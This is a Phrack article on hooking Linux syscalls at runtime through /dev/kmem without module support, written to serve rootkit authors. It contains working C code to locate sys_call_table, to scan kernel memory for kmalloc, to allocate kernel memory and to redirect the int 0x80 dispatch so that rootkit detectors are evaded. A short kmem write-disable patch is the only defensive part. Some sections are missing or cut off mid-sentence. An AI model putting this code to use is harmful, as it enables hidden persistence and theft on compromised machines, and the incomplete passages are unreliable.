Linux on-the-fly kernel patching without LKM

Written by : sd
First published on : Phrack

Contents

  1 - Introduction

  2 - /dev/kmem is our friend

  3 - Replacing kernel syscalls, sys_call_table[]
    3.1 - How to get sys_call_table[] without LKM ?
    3.2 - Redirecting int 0x80 call sys_call_table[eax] dispatch

  4 - Allocating kernel space without help of LKM support
    4.1 - Searching kmalloc() using LKM support
    4.2 - pattern search of kmalloc()
    4.3 - The GFP_KERNEL value
    4.4 - Overwriting a syscall

  5 - What you should take care of

  6 - Possible solutions

  7 - Conclusion

  8 - References

  9 - Appendix: SucKIT: The implementation

Introduction

In the beginning, we must thank Silvio Cesare, who developed the technique of kernel patching a long time ago, most of ideas was stolen from him.

In this paper, we will discuss way of abusing the Linux kernel (syscalls mostly) without help of module support or System.map at all, so that we assume that the reader will have a clue about what LKM is, how a LKM is loaded into kernel etc. If you are not sure, look at some documentation (paragraph 6. [1], [2], [3])

Imagine a scenario of a poor man which needs to change some interesting linux syscall and LKM support is not compiled in. Imagine he have got a box, he got root but the admin is so paranoid and he (or tripwire) don't poor man's patched sshd and that box have not gcc/lib/.h needed for compiling of his favourite LKM rootkit. So there are some solutions, step by step and as an appendix, a full-featured linux-ia32 rootkit, an example/tool, which implements all the techinques described here.

Most of things described there (such as syscalls, memory addressing schemes ... code too) can work only on ia32 architecture. If someone investigate(d) to other architectures, please contact us.

/dev/kmem is our friend

"Mem is a character device file that is an image of the main memory of the computer. It may be used, for example, to examine (and even patch) the system."

For full and complex documentation about run-time kernel patching take a look at excellent Silvio's article about this subject [2].

Just in short: Everything we do in this paper with kernel space is done using the standard linux device, /dev/kmem. Since this device is mostly +rw only for root, you must be root too if you want to abuse it. Note that changing of /dev/kmem permission to gain access is not sufficient. After /dev/kmem access is allowed by VFS then there is second check in device/char/mem.c for capable(CAP_SYS_RAWIO) of process.

We should also note that there is another device, /dev/mem. It is physical memory before VM translation. It might be possible to use it if we were know page directory location. We didn't investigate this possibility.

Selecting address is done through lseek(), reading using read() and writing with help of write() ... simple.

There are some helpful functions for working with kernel stuff:

/* read data from kmem */
static inline int rkm(int fd, int offset, void *buf, int size)
{
        if (lseek(fd, offset, 0) != offset) return 0;
        if (read(fd, buf, size) != size) return 0;
        return size;
}

/* write data to kmem */
static inline int wkm(int fd, int offset, void *buf, int size)
{
        if (lseek(fd, offset, 0) != offset) return 0;
        if (write(fd, buf, size) != size) return 0;
        return size;
}

/* read int from kmem */
static inline int rkml(int fd, int offset, ulong *buf)
{
        return rkm(fd, offset, buf, sizeof(ulong));
}

/* write int to kmem */
static inline int wkml(int fd, int offset, ulong buf)
{
        return wkm(fd, offset, &buf, sizeof(ulong));
}

Replacing kernel syscalls, sys_call_table[]

As we all know, syscalls are the lowest level of system functions (from viewpoint of userspace) in Linux, so we'll be interested mostly in them. Syscalls are grouped together in one big table (sct), it is just a one-dimension array of 256 ulongs (=pointers, on ia32 architecture), where indexing the array by a syscall number gives us the entrypoint of given syscall. That's it.

An example pseudocode:

/* as everywhere, "Hello world" is good for begginers ;-) */

/* our saved original syscall */
int (*old_write) (int, char *, int);
        /* new syscall handler */
        new_write(int fd, char *buf, int count) {
        if (fd == 1) {  /* stdout ? */
                old_write(fd, "Hello world!\n", 13);
                return count;
        } else {
                return old_write(fd, buf, count);
        }
}

old_write = (void *) sys_call_table[__NR_write]; /* save old */
sys_call_table[__NR_write] = (ulong) new_write;  /* setup new one */

/* Err... there should be better things to do instead fucking up console
   with "Hello worlds" ;) */

This is the classic scenario of a various LKM rootkits (see paragraph 7), tty sniffers/hijackers (the halflife's one, f.e. [4]) where it is guaranted that we can import sys_call_table[] and manipulate it in a correct manner, i.e. it is simply "imported" by /sbin/insmod [ using create_module() / init_module() ]

Uhh, let's stop talking about nothing, we think this is clear enough for everybody.

How to get sys_call_table[] without LKM

At first, note that the Linux kernel _doesn not keep_ any kinda of information about it's symbols in case when there is no LKM support compiled in. It is rather a clever decision because why could someone need it without LKM ? For debugging ? You have System.map instead. Well WE need it :) With LKM support there are symbols intended to be imported into LKMs (in their special linker section), but we said without LKM, right ?

As far we know, the most elegant way how to obtain sys_call_table[] is:

#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

struct {
        unsigned short limit;
        unsigned int base;
} __attribute__ ((packed)) idtr;

struct {
        unsigned short off1;
        unsigned short sel;
        unsigned char none,flags;
        unsigned short off2;
} __attribute__ ((packed)) idt;

int kmem;
void readkmem (void *m,unsigned off,int sz)
{
        if (lseek(kmem,off,SEEK_SET)!=off) {
                perror("kmem lseek"); exit(2);
        }
        if (read(kmem,m,sz)!=sz) {
                perror("kmem read"); exit(2);
        }
}

#define CALLOFF 100     /* we'll read first 100 bytes of int $0x80*/
main ()
{
        unsigned sys_call_off;
        unsigned sct;
        char sc_asm[CALLOFF],*p;

        /* well let's read IDTR */
        asm ("sidt %0" : "=m" (idtr));
        printf("idtr base at 0x%X\n",(int)idtr.base);

        /* now we will open kmem */
        kmem = open ("/dev/kmem",O_RDONLY);
        if (kmem<0) return 1;

        /* read-in IDT for 0x80 vector (syscall) */
        readkmem (&idt,idtr.base+8*0x80,sizeof(idt));
        sys_call_off = (idt.off2 << 16) | idt.off1;
        printf("idt80: flags=%X sel=%X off=%X\n",
                (unsigned)idt.flags,(unsigned)idt.sel,sys_call_off);

        /* we have syscall routine address now, look for syscall table
           dispatch (indirect call) */
        readkmem (sc_asm,sys_call_off,CALLOFF);
        p = (char*)memmem (sc_asm,CALLOFF,"\xff\x14\x85",3);
        sct = *(unsigned*)(p+3);
        if (p) {
                printf ("sys_call_table at 0x%x, call dispatch at 0x%x\n",
                        sct, p);
        }
        close(kmem);
}

How it works ? The sidt instruction "asks the processor" for the interrupt descriptor table [asm ("sidt %0" : "=m" (idtr));], from this structure we will get a pointer to the interrupt descriptor of int $0x80 [readkmem (&idt,idtr.base+8*0x80,sizeof(idt));].

>From the IDT we can compute the address of int $0x80's entrypoint [sys_call_off = (idt.off2 << 16) | idt.off1;] Good, we know where int $0x80 began, but that is not our loved sys_call_table[]. Let's take a look at the int $0x80 entrypoint:

[sd@pikatchu linux]$ gdb -q /usr/src/linux/vmlinux
(no debugging symbols found)...(gdb) disass system_call
Dump of assembler code for function system_call:
0xc0106bc8 <system_call>:       push   %eax
0xc0106bc9 <system_call+1>:     cld
0xc0106bca <system_call+2>:     push   %es
0xc0106bcb <system_call+3>:     push   %ds
0xc0106bcc <system_call+4>:     push   %eax
0xc0106bcd <system_call+5>:     push   %ebp
0xc0106bce <system_call+6>:     push   %edi
0xc0106bcf <system_call+7>:     push   %esi
0xc0106bd0 <system_call+8>:     push   %edx
0xc0106bd1 <system_call+9>:     push   %ecx
0xc0106bd2 <system_call+10>:    push   %ebx
0xc0106bd3 <system_call+11>:    mov    $0x18,%edx
0xc0106bd8 <system_call+16>:    mov    %edx,%ds
0xc0106bda <system_call+18>:    mov    %edx,%es
0xc0106bdc <system_call+20>:    mov    $0xffffe000,%ebx
0xc0106be1 <system_call+25>:    and    %esp,%ebx
0xc0106be3 <system_call+27>:    cmp    $0x100,%eax
0xc0106be8 <system_call+32>:    jae    0xc0106c75 <badsys>
0xc0106bee <system_call+38>:    testb  $0x2,0x18(%ebx)
0xc0106bf2 <system_call+42>:    jne    0xc0106c48 <tracesys>
0xc0106bf4 <system_call+44>:    call   *0xc01e0f18(,%eax,4) <-- that's it
0xc0106bfb <system_call+51>:    mov    %eax,0x18(%esp,1)
0xc0106bff <system_call+55>:    nop
End of assembler dump.
(gdb) print &sys_call_table
$1 = (<data variable, no debug info> *) 0xc01e0f18      <-- see ? it's same
(gdb) x/xw (system_call+44)
0xc0106bf4 <system_call+44>:    0x188514ff <-- opcode (little endian)
(gdb)

In short, near to beginning of int $0x80 entrypoint is 'call sys_call_table(,eax,4)' opcode, because this indirect call does not vary between kernel versions (it is same on 2.0.10 => 2.4.10), it's relatively safe to search just for pattern of 'call <something>(,eax,4)'

opcode = 0xff 0x14 0x85 0x<address_of_table>

[memmem (sc_asm,CALLOFF,"\xff\x14\x85",3);]

Being paranoid, one could do a more robust hack. Simply redirect whole int $0x80 handler in IDT to our fake handler and intercept interesting calls here. It is a bit more complicated as we would have to handle reentrancy ...

At this time, we know where sys_call_table[] is and we can change the address of some syscalls:

Pseudocode:
        readkmem(&old_write, sct + __NR_write * 4, 4); /* save old */
        writekmem(new_write, sct + __NR_write * 4, 4); /* set new */
--[ 3.2 - Redirecting int $0x80 call sys_call_table[eax] dispatch

When writing this article, we found some "rootkit detectors" on Packetstorm/Freshmeat. They are able to detect the fact that something is wrong with a LKM/syscalltable/other kernel stuff...fortunately, most of them are too stupid and can be simply fooled by the the trick introduced in [6] by SpaceWalker:

Pseudocode:
        ulong sct = addr of sys_call_table[]
        char *p = ptr to int 0x80's call sct(,eax,4) - dispatch
        ulong nsct[256] = new syscall table with modified entries

        readkmem(nsct, sct, 1024);      /* read old */
        old_write = nsct[__NR_write];
        nsct[__NR_write] = new_write;
        /* replace dispatch to our new sct */
        writekmem((ulong) p+3, nsct, 4);

        /* Note that this code never can work, because you can't
           redirect something kernel related to userspace, such as
           sct[] in this case */

Background:

We create a copy of the original sys_call_table[] [readkmem(nsct, sct, 1024);], then we will modify entries which we're interested in [old_write = nsct[__NR_write]; nsct[__NR_write] = new_write;] and then change _only_ addr of <something> in the call <something>(,eax,4):

0xc0106bf4 <system_call+44>:    call   *0xc01e0f18(,%eax,4)
                                        ~~~~|~~~~~
                                            |__ Here will be address of
                                                _our_ sct[]

LKM detectors (which does not check consistency of int $0x80) won't see anything, sys_call_table[] is the same, but int $0x80 uses our implanted table.

Allocating kernel space without help of LKM support

Next thing that we need is a memory page above the 0xc0000000 (or 0x80000000) address.

The 0xc0000000 value is demarcation point between user and kernel memory. User processes have not access above the limit. Take into account that this value is not exact, and may be different, so it is good idea to figure out the limit on the fly (from int $0x80's entrypoint). Well, how to get our page above the limit ? Let's take a look how regular kernel LKM support does it (/usr/src/linux/kernel/module.c):

...
void inter_module_register(const char *im_name, struct module *owner,
                           const void *userdata)
{
        struct list_head *tmp;
        struct inter_module_entry *ime, *ime_new;

        if (!(ime_new = kmalloc(sizeof(*ime), GFP_KERNEL))) {
                /* Overloaded kernel, not fatal */
        ...
As we expected, they used kmalloc(size, GFP_KERNEL) ! But we can't use kmalloc() yet because:

Searching for kmalloc() using LKM support

If we can use LKM support:

/* kmalloc() lookup */

/* simplest & safest way, but only if LKM support is there */
ulong   get_sym(char *n) {
        struct  kernel_sym      tab[MAX_SYMS];
        int     numsyms;
        int     i;

        numsyms = get_kernel_syms(NULL);
        if (numsyms > MAX_SYMS || numsyms < 0) return 0;
        get_kernel_syms(tab);
        for (i = 0; i < numsyms; i++) {
                if (!strncmp(n, tab[i].name, strlen(n)))
                        return tab[i].value;
        }
        return 0;
}

ulong   get_kma(ulong pgoff)
{
        ret = get_sym("kmalloc");
        if (ret) return ret;
        return 0;
}

We leave this without comments.

Pattern search of kmalloc()

But if LKM is not there, were getting into troubles. The solution is quite dirty, and not-so-good by the way, but it seem to work. We'll walk through kernel's .text section and look for patterns such as:

        push    GFP_KERNEL <something between 0-0xffff>
        push    size       <something between 0-0x1ffff>
        call    kmalloc

All info will be gathered into a table, sorted and the function called most times will be our kmalloc(), here is code:

/* kmalloc() lookup */
#define RNUM 1024
ulong   get_kma(ulong pgoff)
{
        struct { uint a,f,cnt; } rtab[RNUM], *t;
        uint            i, a, j, push1, push2;
        uint            found = 0, total = 0;
        uchar           buf[0x10010], *p;
        int             kmem;
        ulong           ret;

        /* uhh, before we try to brute something, attempt to do things
           in the *right* way ;)) */
        ret = get_sym("kmalloc");
        if (ret) return ret;

        /* humm, no way ;)) */
        kmem = open(KMEM_FILE, O_RDONLY, 0);
        if (kmem < 0) return 0;
        for (i = (pgoff + 0x100000); i < (pgoff + 0x1000000);
             i += 0x10000) {
                if (!loc_rkm(kmem, buf, i, sizeof(buf))) return 0;
                /* loop over memory block looking for push and calls */
                for (p = buf; p < buf + 0x10000;) {
                        switch (*p++) {
                                case 0x68:
                                        push1 = push2;
                                        push2 = *(unsigned*)p;
                                        p += 4;
                                        continue;
                                case 0x6a:
                                        push1 = push2;
                                        push2 = *p++;
                                        continue;
                                case 0xe8:
                                        if (push1 && push2 &&
                                            push1 <= 0xffff &&
                                            push2 <= 0x1ffff) break;
                                default:
                                        push1 = push2 = 0;
                                        continue;
                        }
                        /* we have push1/push2/call seq; get address */
                        a = *(unsigned *) p + i + (p - buf) + 4;
                        p += 4;
                        total++;
                        /* find in table */
                        for (j = 0, t = rtab; j < found; j++, t++)
                                if (t->a == a && t->f == push1) break;
                        if (j < found)
                                t->cnt++;
                        else
                                if (found >= RNUM) {
                                        return 0;
                                }
                                else {
                                        found++;
                                        t->a = a;
                                        t->f = push1;
                                        t->cnt = 1;
                                }
                        push1 = push2 = 0;
                } /* for (p = buf; ... */
        } /* for (i = (pgoff + 0x100000) ...*/
        close(kmem);
        t = NULL;
        for (j = 0;j < found; j++)  /* find a winner */
                if (!t || rtab[j].cnt > t->cnt) t = rtab+j;
        if (t) return t->a;
        return 0;
}

The code above is a simple state machine and it doesn't bother itself with potentionaly different asm code layout (when you use some exotic GCC options). It could be extended to understand different code patterns (see switch statement) and can be made more accurate by checking GFP value in PUSHes against known patterns (see paragraph bellow).

The accuracy of this code is about 80% (i.e. 80% points to kmalloc, 20% to some junk) and seem to work on 2.2.1 => 2.4.13 ok.

The GFP_KERNEL value

Next problem we get while using kmalloc() is the fact that value of GFP_KERNEL varies between kernel series, but we can get rid of it by help of uname()

+-----------------------------------+
| kernel version | GFP_KERNEL value |
+----------------+------------------+
| 1.0.x .. 2.4.5 |     0x3          |
+----------------+------------------+
| 2.4.6 .. 2.4.x |     0x1f0        |
+----------------+------------------+

Note that there is some troubles with 2.4.7-2.4.9 kernels, which sometimes crashes due to bad GFP_KERNEL, simply because the table above is not exact, it only shows values we CAN use.

The code:

#define NEW_GFP         0x1f0
#define OLD_GFP         0x3

/* uname struc */
struct un {
        char    sysname[65];
        char    nodename[65];
        char    release[65];
        char    version[65];
        char    machine[65];
        char    domainname[65];
};

int     get_gfp()
{
        struct un s;
        uname(&s);
        if ((s.release[0] == '2') && (s.release[2] == '4') &&
            (s.release[4] >= '6' ||
            (s.release[5] >= '0' && s.release[5] <= '9'))) {
                return NEW_GFP;
        }
        return OLD_GFP;
}

Overwriting a syscall

As we mentioned above, we can't call kmalloc() from user-space directly, solution is Silvio's trick [2] of replacing syscall:

our_routine may look as something like that:

struct  kma_struc {
        ulong   (*kmalloc) (uint, int);
        int     size;
        int     flags;
        ulong   mem;
} __attribute__ ((packed));

int     our_routine(struct kma_struc *k)
{
        k->mem = k->kmalloc(k->size, k->flags);
        return 0;
}

In this case we directly pass needed info to our routine.

Now we have kernel memory, so we can copy our handling routines there, point entries in fake sys_call_table to them, infiltrate this fake table into int $0x80 and enjoy the ride :)

What you should take care of

It would be good idea to follow these rules when writing something using this technique:

Possible solutions

Okay, now from the good man's point of view. You probably would like to defeat attacks of kids using such annoying toys. Then you should apply following kmem read-only patch and disable LKM support in your kernel.

<++> kmem-ro.diff
--- /usr/src/linux/drivers/char/mem.c   Mon Apr  9 13:19:05 2001
+++ /usr/src/linux/drivers/char/mem.c   Sun Nov  4 15:50:27 2001
@@ -49,6 +51,8 @@
 const char * buf, size_t count, loff_t *ppos)
 {
	ssize_t written;
+       /* disable kmem write */
+       return -EPERM;

  written = 0;
  #if defined(__sparc__) || defined(__mc68000__)
<-->

Note that this patch can be source of troubles in conjuction with some old utilities which depends on /dev/kmem writing ability. That's payment for security.

Conclusion

The raw memory I/O devices in linux seems to be pretty powerful. Attackers (of course, with root privileges) can use them to hide their actions, steal informations, grant remote access and so on for a long time without being noticed. As far we know, there is not so big use of these devices (in the meaning of write access), so it may be good idea to disable their writing ability.

References

 [1] Silvio Cesare's homepage, pretty good info about low-level linux stuff
     [http://www.big.net.au/~silvio]

 [2] Silvio's article describing run-time kernel patching (System.map)
     [http://www.big.net.au/~silvio/runtime-kernel-kmem-patching.txt]

 [3] QuantumG's homepage, mostly virus related stuff
     [http://biodome.org/~qg]

 [4] "Abuse of the Linux Kernel for Fun and Profit" by halflife
     [Phrack issue 50, article 05]

 [5] "(nearly) Complete Linux Loadable Kernel Modules. The definitive guide
      for hackers, virus coders and system administrators."
     [http://www.thehackerschoice.com/papers]

At the end, I (sd) would like to thank to devik for helping me a lot with this crap, to Reaction for common spelling checks and to anonymous editor's friend which proved the quality of article a lot.